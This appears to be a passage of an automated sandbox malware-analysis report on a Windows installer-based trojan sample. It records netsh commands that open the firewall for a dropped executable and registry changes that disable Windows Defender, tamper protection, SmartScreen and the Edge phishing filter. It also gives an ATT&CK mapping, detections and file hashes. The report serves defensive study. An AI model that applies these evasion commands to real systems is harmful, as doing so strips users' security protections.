Source: PowerRun64.exe.0.drBinary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68687BD40 cpuid 7_2_00007FF68687BD40
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,7_2_00007FF686876C40
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: EnumSystemLocalesW,7_2_00007FF68687791C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: GetLocaleInfoW,7_2_00007FF686877548
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_00007FF686877674
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: GetLocaleInfoW,7_2_00007FF686877340
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_00007FF686877498
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: EnumSystemLocalesW,7_2_00007FF686876F8C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,7_2_00007FF6868770F4
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: EnumSystemLocalesW,7_2_00007FF68687705C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: try_get_function,GetLocaleInfoW,7_2_00007FF686877EB0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,11_2_00007FF686876C40
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: EnumSystemLocalesW,11_2_00007FF68687791C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: GetLocaleInfoW,11_2_00007FF686877548
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_00007FF686877674
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: GetLocaleInfoW,11_2_00007FF686877340
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_00007FF686877498
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: EnumSystemLocalesW,11_2_00007FF686876F8C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_00007FF6868770F4
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: EnumSystemLocalesW,11_2_00007FF68687705C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: try_get_function,GetLocaleInfoW,11_2_00007FF686877EB0
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68683D304 GetSystemTimeAsFileTime,GetCurrentThreadId,GetUserNameExW,GetLastError,GetUserNameExW,GetLastError,LeaveCriticalSection,LeaveCriticalSection,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,7_2_00007FF68683D304
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68685F3C0 LookupAccountNameW,GetLastError,GetLastError,LookupAccountNameW,GetLastError,IsValidSid,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,7_2_00007FF68685F3C0
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,CoUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Windows\SysWOW64\reg.exeRegistry value created: SpyNetReportingLocation 0Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\ExclusionsRegistry value created: DisableAutoExclusions 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngineRegistry value created: MpEnablePus 0
Source: C:\Windows\SysWOW64\reg.exeRegistry value created: TamperProtectionSource 2Jump to behavior
Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer SmartScreenEnabled Off
Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter PreventOverrideJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,private
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,private
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
Windows Management Instrumentation
1
Scripting
1
DLL Side-Loading
8
Disable or Modify Tools
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Native API
1
DLL Side-Loading
1
Bypass User Account Control
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol2
Browser Session Hijacking
Junk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts12
Command and Scripting Interpreter
Logon Script (Windows)1
Access Token Manipulation
11
Obfuscated Files or Information
Security Account Manager2
File and Directory Discovery
SMB/Windows Admin Shares1
Clipboard Data
SteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook12
Process Injection
1
Software Packing
NTDS44
System Information Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Timestomp
LSA Secrets121
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials1
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Bypass User Account Control
DCSync1
Process Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Modify Registry
Proc Filesystem1
System Owner/User Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Virtualization/Sandbox Evasion
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Access Token Manipulation
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
Process Injection
Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1515274 Sample: 4hIPvzV6a2.exe Startdate: 22/09/2024 Architecture: WINDOWS Score: 96 47 Multi AV Scanner detection for dropped file 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Machine Learning detection for dropped file 2->51 7 4hIPvzV6a2.exe 2 27 2->7         started        process3 file4 39 C:\Users\user\...\win_version_csharp.exe, PE32 7->39 dropped 41 C:\Users\user\AppData\...\oofzzwcvgbcojt.exe, PE32 7->41 dropped 43 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 7->43 dropped 45 4 other malicious files 7->45 dropped 65 Uses netsh to modify the Windows network and firewall settings 7->65 67 Modifies the windows firewall 7->67 11 cmd.exe 1 7->11         started        14 cmd.exe 1 7->14         started        16 netsh.exe 2 7->16         started        18 netsh.exe 2 7->18         started        signatures5 process6 signatures7 69 Uses cmd line tools excessively to alter registry or file data 11->69 20 reg.exe 11->20         started        23 reg.exe 1 1 11->23         started        25 reg.exe 1 1 11->25         started        35 29 other processes 11->35 27 conhost.exe 14->27         started        29 SetACL64.exe 1 14->29         started        37 7 other processes 14->37 31 conhost.exe 16->31         started        33 conhost.exe 18->33         started        process8 signatures9 53 Adds extensions / path to Windows Defender exclusion list (Registry) 20->53 55 Disable Windows Defender real time protection (registry) 20->55 57 Disable Microsoft Windows Malicious Software Removal Tool Heartbeat Telemetry 23->57 59 Disables Windows Defender Tamper protection 25->59 61 Disables the phising filter of Microsoft Edge 35->61 63 Disables the Smart Screen filter 35->63

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
4hIPvzV6a2.exe37%ReversingLabsWin32.Trojan.Generic
4hIPvzV6a2.exe44%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\PowerRun64.exe21%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\PowerRun64.exe29%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SelfDel.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SelfDel.dll1%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\nsExec.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\nsExec.dll0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe5%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\win_version_csharp.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\win_version_csharp.exe1%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
https://helgeklein.com0%Avira URL Cloudsafe
http://www.wolfpackheights.click0%Avira URL Cloudsafe
https://helgeklein.com.0%Avira URL Cloudsafe
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe0%Avira URL Cloudsafe
https://helgeklein.com0%VirustotalBrowse
https://helgeklein.com.0%VirustotalBrowse
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe0%VirustotalBrowse
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://nsis.sf.net/NSIS_ErrorError4hIPvzV6a2.exefalse
  • URL Reputation: safe
unknown
http://www.wolfpackheights.click4hIPvzV6a2.exe, 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://helgeklein.com.SetACL64.exe, SetACL64.exe, 0000000B.00000000.1717859358.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.1721888833.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.1720704714.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.1727313975.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.1724751367.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000002.1728519189.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000000.1727792891.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://helgeklein.comSetACL64.exe, SetACL64.exe, 0000000B.00000000.1717859358.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.1721888833.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.1720704714.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.1727313975.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.1724751367.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000002.1728519189.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000000.1727792891.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exeSetACL64.exe, SetACL64.exe, 0000000B.00000000.1717859358.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.1721888833.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.1720704714.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.1727313975.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.1724751367.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000002.1728519189.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000000.1727792891.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
No contacted IP infos
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1515274
Start date and time:2024-09-22 07:11:07 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 44s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:48
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:4hIPvzV6a2.exe
renamed because original name is a hash value
Original Sample Name:99a7d3f6669bc38e1fe1ca11e9085516.exe
Detection:MAL
Classification:mal96.phis.evad.winEXE@154/10@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 98%
  • Number of executed functions: 123
  • Number of non-executed functions: 161
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Stop behavior analysis, all processes terminated
  • Excluded IPs from analysis (whitelisted): 4.175.87.197, 93.184.221.240, 13.85.23.206
  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, www.wolfpackheights.click, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
No simulations
No context
No context
No context
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\PowerRun64.exe3Dut8dFCwD.exeGet hashmaliciousUnknownBrowse
    Ms63nDrOBa.exeGet hashmaliciousUnknownBrowse
      Ptmhbplhxb.exeGet hashmaliciousUnknownBrowse
        P196hUN2fw.exeGet hashmaliciousUnknownBrowse
          e4.exeGet hashmaliciousRedLineBrowse
            2dOeahdsto.exeGet hashmaliciousXmrigBrowse
              bQQHP9ciRL.exeGet hashmaliciousXmrigBrowse
                DllHost.exeGet hashmaliciousXmrigBrowse
                  Fza7TPh6Z7.exeGet hashmaliciousUnknownBrowse
                    SAlxtNmHFR.exeGet hashmaliciousRedLine XmrigBrowse
                      C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SelfDel.dllupdate_231101.exeGet hashmaliciousUnknownBrowse
                        update_231101.exeGet hashmaliciousUnknownBrowse
                          sdbmzc_unpack.exeGet hashmaliciousUnknownBrowse
                            sdbmzc_unpack.exeGet hashmaliciousUnknownBrowse
                              sdbmzc.exeGet hashmaliciousUnknownBrowse
                                sdbmzc.exeGet hashmaliciousUnknownBrowse
                                  sdbmzc.exeGet hashmaliciousUnknownBrowse
                                    sdbmzc.exeGet hashmaliciousUnknownBrowse
                                      Process:C:\Users\user\Desktop\4hIPvzV6a2.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):945944
                                      Entropy (8bit):6.654096172451499
                                      Encrypted:false
                                      SSDEEP:24576:X2DW/xbMX2YIbxQsu3/PNLoQ+HyS2I4jRk:X2EgXoQsW/PNUQWnX4jRk
                                      MD5:EFE5769E37BA37CF4607CB9918639932
                                      SHA1:F24CA204AF2237A714E8B41D54043DA7BBE5393B
                                      SHA-256:5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
                                      SHA-512:33794A567C3E16582DA3C2AC8253B3E61DF19C255985277C5A63A84A673AC64899E34E3B1EBB79E027F13D66A0B8800884CDD4D646C7A0ABE7967B6316639CF1
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 21%
                                      • Antivirus: Virustotal, Detection: 29%, Browse
                                      Joe Sandbox View:
                                      • Filename: 3Dut8dFCwD.exe, Detection: malicious, Browse
                                      • Filename: Ms63nDrOBa.exe, Detection: malicious, Browse
                                      • Filename: Ptmhbplhxb.exe, Detection: malicious, Browse
                                      • Filename: P196hUN2fw.exe, Detection: malicious, Browse
                                      • Filename: e4.exe, Detection: malicious, Browse
                                      • Filename: 2dOeahdsto.exe, Detection: malicious, Browse
                                      • Filename: bQQHP9ciRL.exe, Detection: malicious, Browse
                                      • Filename: DllHost.exe, Detection: malicious, Browse
                                      • Filename: Fza7TPh6Z7.exe, Detection: malicious, Browse
                                      • Filename: SAlxtNmHFR.exe, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.@............yGI......p\.}....pJ......p[.............._.....................pP......ZJ......ZK.......H......pN.....Rich............................PE..d...(..K..........#......\...*......|..........@.....................................N........@...............@.................................T................j...Q.. ............................................................p...............................text....Z.......\.................. ..`.rdata...V...p...X...`..............@..@.data............v..................@....pdata...j.......l..................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\4hIPvzV6a2.exe
                                      File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                      Category:dropped
                                      Size (bytes):15086
                                      Entropy (8bit):5.53072581096406
                                      Encrypted:false
                                      SSDEEP:192:Jci1/zqaRKheZqCHXbIixCaijSFtQeEA3eeYVRbEZbJ24Jd:Jci1/VOBCLTijSFieEQeeeRbEZbJ5d
                                      MD5:D365FDC90B0B365D53DF324B2AD2B505
                                      SHA1:167BBF5DA119B68EF6DE5C695F17EAD294D4BE31
                                      SHA-256:59FB7DAC3042D08387273B4834E039C5E65ACEABD2496901E44C2F35C165B3E2
                                      SHA-512:8D199278730022FF0ACE3F2745EA2C4D03A1EEBF4228FBE3DE6263F4EB6EF90097D9C945E2BE3C41756C8596B0D14D595032ED177AF79425CC6AB52DBF63E6D5
                                      Malicious:false
                                      Preview:............ .h...6... .... .........00.... ..%..F...(....... ..... ..........................................................................................5 ..?.4.D$4.@%4.>!4............................................*v|.1...y.........L........................................................k....................................................Y......_...............................................................................................................................................................................................................................................................................................q...u...t...t...x......................................................................................................M..J..G............._..Q..G..G...=...J..................U...T.z.u.t.v.o.x.x.r..._..8~.8v.=v.Pv..~v...v...v...r.........ZB..x.z...O.......................................................
                                      Process:C:\Users\user\Desktop\4hIPvzV6a2.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                      Category:dropped
                                      Size (bytes):5120
                                      Entropy (8bit):5.021119508727912
                                      Encrypted:false
                                      SSDEEP:96:NdekHUj5z13cPopei+Ml9PNDFbS7xg+TScrQ5:NdeuU9xcPopr+M9FbSS+TSE
                                      MD5:E5786E8703D651BC8BD4BFECF46D3844
                                      SHA1:FEE5AA4B325DEECBF69CCB6EADD89BD5AE59723F
                                      SHA-256:D115BCE0A787B4F895E700EFE943695C8F1087782807D91D831F6015B0F98774
                                      SHA-512:D14AD43A01DB19428CD8CCD2FE101750860933409B5BE2EB85A3E400EFCD37B1B6425CE84E87A7FE46ECABC7B91C4B450259E624C178B86E194BA7DA97957BA3
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 1%, Browse
                                      Joe Sandbox View:
                                      • Filename: update_231101.exe, Detection: malicious, Browse
                                      • Filename: update_231101.exe, Detection: malicious, Browse
                                      • Filename: sdbmzc_unpack.exe, Detection: malicious, Browse
                                      • Filename: sdbmzc_unpack.exe, Detection: malicious, Browse
                                      • Filename: sdbmzc.exe, Detection: malicious, Browse
                                      • Filename: sdbmzc.exe, Detection: malicious, Browse
                                      • Filename: sdbmzc.exe, Detection: malicious, Browse
                                      • Filename: sdbmzc.exe, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................t........................................Rich....................PE..L...rb.R...........!.............`..@v...p................................................@.........................`...D...X...........X...........................................................................................................UPX0.....`..............................UPX1.........p......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....
                                      Process:C:\Users\user\Desktop\4hIPvzV6a2.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):616312
                                      Entropy (8bit):6.302197712270286
                                      Encrypted:false
                                      SSDEEP:12288:3G2NBTh+l8gAqAbdsuEa3nZGSebY7o937bfJ9Ud:3xNBTYlaLdaynZGBc7orbJ9Ud
                                      MD5:1FB64FF73938F4A04E97E5E7BF3D618C
                                      SHA1:AA0F7DB484D0C580533DEC0E9964A59588C3632B
                                      SHA-256:4EFC87B7E585FCBE4EAED656D3DBADAEC88BECA7F92CA7F0089583B428A6B221
                                      SHA-512:DA6007847FFE724BD0B0ABE000B0DD5596E2146F4C52C8FE541A2BF5F5F2F5893DCCD53EF315206F46A9285DDBD766010B226873038CCAC7981192D8C9937ECE
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................}.........@..........................................................g...........Rich....................PE..d.....`..........".................x$.........@..........................................`.............................................................x.... ..P@...J..x...............p.......................(.......8...............8............................text............................... ..`.rdata... ......."..................@..@.data....8..........................@....pdata..P@... ...B..................@..@_RDATA.......p.......$..............@..@.rsrc...x............&..............@..@.reloc...............<..............@..B................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\4hIPvzV6a2.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1012
                                      Entropy (8bit):4.927481769041986
                                      Encrypted:false
                                      SSDEEP:24:HCZlGVbh9lGVb4iWlGVI9lGVZiWlGVR9lGVIiWlGVYh9lGVY4i8:HCZlGf9lG+vlGS9lGLvlGX9lG2vlGWhi
                                      MD5:B5A4A801110BF01C3B209959D75E6268
                                      SHA1:910D3C76B543D6D1EBF0319D3CCD0034A20C26BA
                                      SHA-256:4AE6C881FBA8868FEFA5C7E9D8B0FBB93FB207C4FB834CA323B3215CC76F694F
                                      SHA-512:78000CE7612958CBB01F77B3E18C4E4092FA31E7095C89C78FB297ED36D5601EF7ADF22D65C7AAA4A9228F3D0F4103ACD421AC1F60BF871B8148E5206EF92182
                                      Malicious:false
